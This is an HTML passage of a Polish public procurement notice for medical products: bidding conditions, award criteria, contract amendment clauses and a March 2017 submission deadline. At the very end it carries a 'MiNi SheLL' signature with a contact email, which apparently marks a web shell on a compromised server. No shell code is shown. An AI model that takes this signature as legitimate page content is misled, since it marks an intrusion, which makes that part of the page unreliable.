1.4	 W przypadku wskazania przez Wykonawcę dostępności oświadczeń lub dokumentów, o których mowa w ust. 1 niniejszego Rozdziału w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobiera samodzielnie z tych baz danych wskazane przez Wykonawcę oświadczenia lub dokumenty.
1.5	 W przypadku wskazania przez Wykonawcę oświadczeń lub dokumentów, o których mowa w ust. 1, które znajdują się w posiadaniu zamawiającego, w szczególności oświadczeń lub dokumentów przechowywanych przez zamawiającego zgodnie z art. 97 ust. 1 ustawy, Zamawiający korzysta z posiadanych oświadczeń lub dokumentów, o ile są one aktualne.
1.6	 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków określonych 
w ust. 1 winien spełniać co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie.
2.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Pełnomocnictwo musi być złożone w formie oryginału lub notarialnie potwierdzonej kopii. Treść pełnomocnictwa powinna dokładnie określić zakres umocowania.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1.	żaden z Wykonawców nie może podlegać wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 24 ustawy;
2.	przynajmniej jeden z Wykonawców lub wszyscy Wykonawcy łącznie musza spełniać warunki udziału w postępowaniu.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>20</td></tr><tr><td>termin płatności</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />§10
1.	Strony postanawiają, że dokonają zmiany wynagrodzenia w wypadku zmiany:
a)	stawki podatku od towarów i usług, przy czym automatycznej zmianie ulega cena brutto, natomiast cena netto pozostaje bez zmian. Zmieniona stawka podatku VAT obowiązuje strony od dnia wejścia w życie odpowiednich przepisów prawa.
b)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10  października 2002 r. o minimalnym wynagrodzeniu za pracę
c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społecznemu lub zdrowotne.
2.	Zmiana wysokości wynagrodzenia obowiązywać będzie od dnia wejścia w życie nowych przepisów prawa, o których mowa w ust. 1, z zastrzeżeniem odpowiednio ust. 7 i 8.
3.	W przypadku zmiany, o której mowa w ust. 1 pkt b) wynagrodzenie Wykonawcy ulegnie zmianie o wartość rzeczywistego wzrostu kosztu Wykonawcy wynikającą ze zwiększenia minimalnego wynagrodzenia osób bezpośrednio wykonujących zamówienie.
4.	W przypadku zmiany, o której mowa w ust. 1 pkt c) wynagrodzenie Wykonawcy ulegnie zmianie o wartość rzeczywistego   wzrostu kosztu Wykonawcy wynikającą ze zwiększenia wynagrodzenia osób bezpośrednio wykonujących zamówienie, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia wskazanych osób.
5.	Wprowadzenie zmian wysokości wynagrodzenia Wykonawcy wymaga uprzedniego złożenia przez Wykonawcę pisemnego oświadczenia o wysokości dodatkowych kosztów wynikających z wprowadzenia zmian, o których mowa w ust. 1, w którym zostaną zawarte następujące informacje: wykaz pracowników zatrudnionych przy realizacji zamówienia, liczba przepracowanych przez tych pracowników roboczogodzin, rodzaj zawartych z nimi umów oraz wysokość należnego im wynagrodzenia netto oraz brutto przed i po wprowadzeniu zmian w przepisach prawnych, o których mowa w ust. 1.
6.	W przypadku, gdy Zamawiający poweźmie wątpliwość, co do treści oświadczenia Wykonawcy, o którym mowa w ust. 5,  wówczas Wykonawca będzie zobowiązany do złożenia na pisemne żądanie Zamawiającego dokumentów, z których wynikać będą okoliczności podane przez Wykonawcę w powołanym oświadczeniu.
7.	Wykonawca powinien złożyć oświadczenie, o którym mowa w ust. 5, w nieprzekraczalnym terminie 7 dni od dnia powzięcia wiadomości o zmianie przepisów, o których mowa w ust. 1.
8.	W przypadku, gdy Wykonawca nie dochowa terminu ustalonego w ust. 7, wówczas zmiana stosownych postanowień umowy, wejdzie w życie dopiero od dnia, w którym Wykonawca przedłożył oświadczenie, o którym mowa ust. 5.
9.	Jeżeli zaistnieje sytuacja, o której mowa w ust. 6, wówczas zmiana właściwych postanowień umowy, wejdzie w życie dopiero od dnia, w którym Wykonawca złoży zgodnie z żądaniem Zamawiającego stosowne dokumenty.
10.	Zmiana treści umowy wymaga zachowania formy pisemnej pod rygorem nieważności.


§11
1.	Zmiany wymienione w ust. 2, 3, 4, 5 i 6 mogą być dokonane na wniosek Wykonawcy w terminie 14 dni od dnia przesłania zawiadomienia w formie aneksu do umowy.



2.	W przypadku szczególnych okoliczności, takich jak wstrzymanie lub zakończenie produkcji, strony dopuszczają możliwość dostarczania odpowiedników towarów objętych umową w cenach nie przewyższających cen zawartych w ofercie przetargowej, o właściwościach wyszczególnionych w załączniku nr 1A do umowy.
3.	Zamawiający dopuszcza możliwość zaoferowania odpowiedników towarów objętych umową w cenach nie przekraczających  cen zawartych w ofercie przetargowej o właściwościach wyszczególnionych w załączniku nr 1A do umowy.
4.	Zamawiający dopuszcza możliwość zmiany wielkości opakowania towaru objętego umową przetargową z możliwością przeliczenia ceny nie przekraczającej ceny zaoferowanej w ofercie przetargowej.
5.	W przypadku niezrealizowania umowy w terminie  w zakresie ilości i wartości przedmiotu zamówienia, z przyczyn dotyczących Zamawiającego  wynikających z niewykorzystania w działalności leczniczej ilości wyrobów dostarczanych, Zamawiający przewiduje możliwość przedłużenia terminu realizacji umowy, nie dłużej niż o trzy miesiące, co zostanie potwierdzone aneksem do umowy.
6.	Wszelkie zmiany niniejszej umowy będą dokonywane przez strony w formie pisemnego aneksu pod rygorem nieważności.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 10/03/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu oraz braku podstaw do wykluczenia należy przedłożyć wraz z ofertą:
a)	aktualne na dzień składania ofert o dopuszczenie do udziału w postępowaniu oświadczenie stanowiące wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu; (zgodnie z wzorem załącznika nr 2 do SIWZ),
b)	oświadczenie wykonawcy o posiadaniu dokumentów dopuszczających do obrotu i używania zaoferowanego asortymentu zgodnie z wymaganiami prawnymi określonymi w ustawie z dnia 20 maja 2010 roku o wyrobach medycznych (Dz. U. z 2015 r., poz. 876 i 1918) i rozporządzeniami wykonawczymi wydanymi na jej podstawie -  zawarte w załączniku 6 do SIWZ.
c)	aktualne katalogi z wyszczególnieniem numerów katalogowych  dla wszystkich oferowanych towarów. W katalogach należy czytelnie oznakować każdą oferowaną pozycję (np. pozycja 2) .
2. Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej Zamawiającego informacji z otwarcia ofert
    przekazuje Zamawiającemu:
a)	oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy. Wraz ze złożeniem  oświadczenia, Wykonawca  może  przedstawić  dowody,  że powiązania  z  innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia
3.  Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec ich podstaw
     wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasady, warunków udział w postępowaniu.
      - zamieszcza informacje o tych podmiotach w oświadczeniu, o którym mowa w ust. 1 pkt. a.
4. Oświadczenia, o których mowa w niniejszej SIWZ składane przez Wykonawcę i inne podmioty, na zdolnościach lub 
    sytuacji których podlega Wykonawca na zasadach określonych w art. 22a ustawy Pzp składane są w oryginale
5. Dokumenty, o których mowa w niniejszej SIWZ inne niż oświadczenia składane są w oryginale lub kopii potwierdzonej 
     za zgodność z oryginałem.
6. Poświadczenia za zgodność z oryginałem dokonuje odpowiednio Wykonawca, podmiot na którego zdolnościach lub
    sytuacji polega Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego w zakresie
    dokumentów, które każdego z nich dotyczą.
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com